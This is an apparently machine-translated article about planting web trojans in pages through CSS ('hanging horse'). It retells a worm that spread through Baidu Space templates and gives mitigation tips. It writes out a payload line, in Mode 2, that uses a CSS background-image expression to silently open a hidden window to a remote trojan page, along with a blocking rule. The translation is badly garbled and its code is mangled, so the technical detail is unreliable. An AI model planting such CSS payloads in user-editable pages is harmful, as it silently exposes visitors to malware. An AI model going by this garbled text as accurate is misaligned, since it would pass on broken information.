Detailed web page CSS code hanging Horse Process

When you look at this article, you may wonder if it was wrong? Yes, CSS code can also hang Trojan, especially now many websites support Rich text submission.

The website hangs the horse the means originally very unitary, but along with the Web2.0 technology as well as the blog, the wiki and so on widespread application, hangs the horse also to emerge the various technology, in which the CSS hangs the horse way, may say is the Web2.0 age hacker's most loves. There are many very famous websites have been hacked by hackers using CSS to hang the horse.

In my impression, the most profound memory is Baidu space CSS hanging horse. At that time, Baidu Space launched not long, there are many Baidu users received a similar "ha, happy holiday!" Warmly celebrate 2008, the mood is good, remember to think of me! Http://hi.baidu.com/XXXXX message.

Because the web site is Baidu Space Web site, many users think there will be no security problems, plus may be their friends sent, so will not hesitate to click into. But after entering the specified URL, the user will be infected with the worm and continue to propagate.

Because the worm spread very serious, eventually led to Baidu Space had to issue an official statement to remind users, and a lot of trouble in the server to clear the worm malicious code. That time the horse incident using the Baidu Space CSS template function, through the deformation of the expression in the CSS code dynamic execution of the script, so that the specified remote malicious code files in the background quietly run and send a large number of forged information.

I suggest that when you click on unfamiliar links, you need to have a lot of heart, the big site is also likely to be hung horse. When you are surfing the Internet, it is best to use some of the security aids with the Web Trojan interception function.

Why does the hacker choose CSS to hang the horse?

In the Web1.0 era, the use of e hanging horse for hackers, rather than to better realize the hidden Trojan, rather than a helpless choice. In simple HTML Web pages and the lack of interactive Web sites, hackers can use a very limited means, even if the adoption of complex camouflage, it is easy to see through, not as good as e direct and effective.

But now the interactive Web2.0 website is more and more, allowing users to set up and modify the blog, SNS community and so on appear. These highly interactive communities and blogs tend to provide rich functionality and allow users to use CSS cascading style sheets to make free changes to the site's web pages, prompting the CSS to pop.

The hacker uses the CSS to hang the horse, often is borrows the netizen to some big website's trust, the CSS malicious code hangs to the blog or other supports the CSS webpage, when Netizen accesses this webpage the malicious code will carry on. It's like you go to a well-known and fully licensed large hospital, you trust the hospital, but you see the clinic has been outsourced by the quack, and in the name of the hospital to use your trust to successfully deceive you. But when you go to find someone afterwards, the hospital is often a face innocent. For security engineers, CSS hanging horse's troubleshooting is essential common sense.

CSS horse attack and defense record

The way to attack CSS is more, but the mainstream way is through the loophole of the blog or SNS social networking site system, the malicious CSS code to support the personalized page CSS features. Below we take a typical CSS hanging horse way for example to explain.

Mode 1:

Body

The main function of "Background-image" in CSS is to define the background picture of the page. This is the most typical CSS hanging horse way, this malicious code is mainly through the "background-image" with T code to let the Web Trojan quietly in the user's computer run.

So how do you hang this CSS malicious code into a normal Web page? Hackers can put the generated Trojan horse to their designated location, and then put the malicious code into the Web page of the horse, or Hang horse page called the CSS file.


Mode 2:

Body

Background-image:url (T:open ("http://www"). X.com/muma.htm "," NewWindow "," border= "1″height=0,width=0,top=1000,center=0,toolbar=no,menubar=no,scrollbars=no, Resizable=no,location=no,status=no "))

Mode 1 of the CSS hanging Horse technology, in the runtime will appear blank pages, affecting the normal access of web visitors, it is easier to find. However, this code in mode 2 uses the open window of T, opens a hidden window, silently runs a new window in the background and activates access to the Web page overflow Trojan page, does not affect visitors to view the content of the Web page, so more covert.

Anti-network servers are hanging horses, and information such as anti-virus software alarms is usually present. As a result of constantly updated vulnerabilities, horse types at all times in the transformation, through the reflection of the client to find whether the server is hanging horse often overlooked larger. The correct way is to often check the server log, find unusual information, often check the site code, use the Web Trojan detection system, for troubleshooting.

At present, in addition to using the previous blocking pop-up window to prevent the use of CSS, you can also set CSS filter in the Web page, the CSS filter out. However, if you choose to filter CSS, first of all, you need to pay attention to their relevant web page has CSS content, so we still have to block the way to prevent CSS. The blocking code looks like this:

Emiao1:expression (this.src= "About:blank", this.outerhtml= "");

The IE404 of the alien Trojan code is rewritten to cost the address of the error page so that the T code in Outland is not downloaded. But the blocking approach also has a natural Achilles heel.

Now we learn how to hang the horse in the CSS code, we should immediately go to see if our website has such a loophole, timely fill up.